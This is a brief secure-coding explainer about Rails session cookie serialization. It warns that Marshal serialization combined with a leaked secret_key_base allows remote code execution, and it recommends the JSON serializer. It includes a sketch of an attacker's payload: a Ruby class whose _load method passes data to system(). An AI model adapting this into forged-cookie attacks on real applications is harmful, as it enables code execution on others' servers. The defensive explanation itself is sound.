Rails Session Serialization vulnerabilities occur when Rails session data is serialized insecurely, particularly when using Marshal serialization with cookies or when the secret key is compromised, potentially leading to remote code execution.
# Rails session serializers
:json # Safe - JSON cannot contain executable code
:marshal # Dangerous - Can deserialize arbitrary Ruby objects
:hybrid # Reads both, writes JSON (for migration)If an attacker knows the Rails secret_key_base, they can forge session cookies containing malicious Marshal payloads that execute code when deserialized.
# Attacker creates malicious session cookie
# Using known secret_key_base + Marshal payload
# Payload that executes system command
class Exploit
def self._load(data)
system(data)
end
end
# When Rails deserializes the cookie → RCE# config/initializers/session_store.rb
Rails.application.config.action_dispatch.cookies_serializer = :json
# Ensure secret_key_base is:
# - Strong (128+ random hex characters)
# - Not in version control
# - Different per environment